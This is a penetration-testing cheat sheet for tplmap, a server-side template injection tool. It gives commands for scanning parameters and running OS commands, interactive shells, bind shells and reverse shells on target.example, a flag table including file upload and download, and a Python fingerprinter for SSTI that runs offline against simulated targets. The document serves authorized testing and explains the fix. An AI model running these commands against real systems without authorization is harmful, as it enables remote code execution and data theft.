tplmap Cheat Sheet
Server-Side Template Injection detection and exploitation for multiple template engines.
Overview
Tplmap detects and exploits Server-Side Template Injection (SSTI): the bug where user input is concatenated into template source and rendered, instead of being passed to the template as data. It ships engine plugins for Python (Mako, Jinja2, Tornado), PHP (Smarty, Twig), Java (Freemarker, Velocity), JavaScript (Nunjucks, Pug, doT, Marko, Dust, EJS) and Ruby (ERB, Slim), plus generic code-evaluation checks for each language. Point it at suspected injection points (name or greeting parameters, preview features, e-mail templates) on applications you are authorized to test.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
```bash
git clone https://github.com/epinna/tplmap.git
cd tplmap && pip install -r requirements.txt
```

Essential commands
Scan URL parameter
```bash
./tplmap.py -u "http://target.example/page?name=John"
```

Without a * marker tplmap tests every parameter of the request in turn.

POST body field

```bash
./tplmap.py -u "http://target.example/render" -d "template=test"
```

Common workflows
Detect the engine and run a command (detection happens first; --os-cmd runs one command, --os-shell drops into an interactive shell)

```bash
./tplmap.py -u "http://target.example/hello?name=test" --os-cmd id
./tplmap.py -u "http://target.example/hello?name=test" --os-shell
```

Cookie or header injection (headers use "Name: value" syntax, cookies "name=value"; * marks the injection point)

```bash
./tplmap.py -u "http://target.example/" -H "User-Agent: *"
./tplmap.py -u "http://target.example/" -c "preferences=*"
```

Bind shell (only when an inbound port on the target is in scope; use --reverse-shell HOST PORT when the target cannot accept inbound connections)

```bash
./tplmap.py -u "http://target.example/page?name=x" --bind-shell 4444
```

Manual polyglot probe first: send it in the parameter and look for 49 in the response. Which fragment evaluated tells you the syntax family ({{ }} Jinja2/Twig/Nunjucks, ${ } Freemarker/Mako/Velocity, <%= %> ERB/EJS); a response that echoes the probe unchanged is reflection, not SSTI.

```
{{7*7}}${7*7}<%= 7*7 %>
```

Flags reference
| Flag | Purpose |
|---|---|
| -u URL | Target URL; mark the injection point with * (otherwise every parameter is tested) |
| -X METHOD | Force the HTTP method (e.g. PUT) |
| -d DATA | POST data as a query string (field=*) |
| -c COOKIE | Cookie injection point (name=*) |
| -H HEADER | Header injection point ("Name: *") |
| --injection-tag STRING | Use a marker other than * |
| -e ENGINE | Force a template engine instead of detecting it |
| --level LEVEL | Depth of code-context escapes to try (1-5, default 1) |
| --technique R/T | R rendered, T time-based blind (default RT) |
| --proxy URL | Send traffic through an HTTP proxy (e.g. Burp) |
| --os-cmd CMD | Run one OS command |
| --os-shell | Interactive OS shell |
| --tpl-shell | Interactive shell inside the template engine (useful when OS access is sandboxed) |
| --tpl-code CODE | Inject template code directly |
| --upload LOCAL REMOTE | Upload a file to the target |
| --download REMOTE LOCAL | Download a file from the target |
| --bind-shell PORT | Spawn a shell listening on PORT on the target and connect to it |
| --reverse-shell HOST PORT | Shell on the target that connects back to HOST PORT (two arguments, not HOST:PORT) |
Tips
- Mark the injection point with * in the URL, body, cookie or header (name=*); without a marker tplmap tests every parameter, so mark exactly the one you mean.
- Start with a manual {{7*7}} (or the polyglot above) in Burp Repeater; if 49 appears and the raw payload does not, the input reaches a template, so run tplmap against that parameter. A page that echoes {{7*7}} unchanged is reflection, not SSTI.
- Sandbox escapes differ per engine: --os-cmd and --os-shell need a route from the template language to the OS, which a sandboxed environment or a minimal container without a shell may not provide. Fall back to --tpl-shell or --tpl-code and record the limitation.
- Record the detected engine and its language (Jinja2, Twig, Freemarker, etc.), the parameter and the --level that worked in the report; the fix is engine-specific, but always amounts to passing input as a template variable, never as template source.
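The manual probe step in the workflows and the {{7*7}} tip above, as an added example (this is not tplmap's code): a small Python fingerprinter that sends the polyglot's pieces one at a time, counts a hit only when the product appears and the raw payload does not, and then runs the 3*'7' check that separates Jinja2 from Twig. It is driven through a send() callable; http_sender() builds one for a GET URL marked with * (assumed URL shape, not exercised offline), and the three fake_*_target functions are constructed stand-ins for a vulnerable Jinja2 app, a vulnerable Twig app and the fixed view, so the whole script runs without a network.

```python
"""Manual SSTI fingerprint before running tplmap (added example, not tplmap code)."""
import html
import re
from typing import Callable, Optional

# Operands whose product is unlikely to appear on a page by accident.
A, B = 1337, 42
PRODUCT = str(A * B)   # "56154"
EXPR = f"{A}*{B}"

# The page's polyglot split into its syntax families, plus Ruby-style #{ }.
# A hit on one family narrows the engine list before tplmap is pointed at it.
PROBES = [
    ("{{" + EXPR + "}}", "{{ }}: Jinja2, Twig, Nunjucks"),
    ("${" + EXPR + "}", "${ }: Freemarker, Mako, Velocity"),
    ("<%= " + EXPR + " %>", "<%= %>: ERB, EJS"),
    ("#{" + EXPR + "}", "#{ }: Ruby interpolation (Slim, ERB)"),
]


def evaluated(body: str, payload: str) -> bool:
    """A probe counts only if the product shows up AND the raw payload does not:
    a verbatim echo means reflection (XSS territory), not template evaluation."""
    return PRODUCT in body and payload not in body


def fingerprint(send: Callable[[str], str]) -> Optional[dict]:
    """send(payload) must return the response body with payload at the injection point."""
    if PRODUCT in send("tplmapprobe"):
        raise ValueError(f"baseline already contains {PRODUCT}; choose other operands")
    for payload, family in PROBES:
        if not evaluated(send(payload), payload):
            continue
        hint = family
        if payload.startswith("{{"):
            # Same syntax, different host language: Python repeats the string,
            # PHP coerces it to a number. Classic Jinja2-vs-Twig discriminator.
            body = send("{{3*'7'}}")
            if "777" in body:
                hint = "Jinja2 (Python: 3*'7' -> '777')"
            elif "21" in body:
                hint = "Twig (PHP: 3*'7' -> 21)"
        return {"payload": payload, "family": family, "engine_hint": hint}
    return None


def http_sender(url_with_marker: str) -> Callable[[str], str]:
    """GET sender for a URL with * at the injection point (tplmap's -u convention).
    Assumed shape, e.g. "http://target.example/hello?name=*"; not exercised offline."""
    from urllib.parse import quote
    from urllib.request import urlopen

    def send(payload: str) -> str:
        with urlopen(url_with_marker.replace("*", quote(payload, safe=""))) as resp:
            return resp.read().decode("utf-8", "replace")
    return send


# Constructed stand-ins for the target so the example runs offline.
_MUSTACHE = re.compile(r"\{\{\s*([0-9*' ]+?)\s*\}\}")


def _render(expr: str, php_semantics: bool) -> str:
    """Evaluates the demo's arithmetic probes only; the regex above limits the
    character set. This mimics the engine, it is not part of the detector."""
    if php_semantics:
        expr = re.sub(r"'(\d+)'", r"\1", expr)   # PHP: '7' becomes 7
    return str(eval(expr, {"__builtins__": {}}, {}))


def fake_jinja2_target(name: str) -> str:
    """Like a Flask view doing render_template_string("Hello " + name)."""
    return "<h1>Hello " + _MUSTACHE.sub(lambda m: _render(m.group(1), False), name) + "</h1>"


def fake_twig_target(name: str) -> str:
    """Like a PHP app feeding user input to Twig as template source."""
    return "<h1>Hello " + _MUSTACHE.sub(lambda m: _render(m.group(1), True), name) + "</h1>"


def fake_safe_target(name: str) -> str:
    """The fixed view: input passed as a variable and auto-escaped, never parsed."""
    return "<h1>Hello " + html.escape(name) + "</h1>"


if __name__ == "__main__":
    for label, target in [("jinja2", fake_jinja2_target), ("twig", fake_twig_target),
                          ("safe", fake_safe_target)]:
        print(label, fingerprint(target))
```

Against a live, authorized target replace the fake with `fingerprint(http_sender("http://target.example/hello?name=*"))`; a non-None result names the parameter and syntax family to hand to tplmap (`-u` with the same * marker, optionally `-e` with the suggested engine).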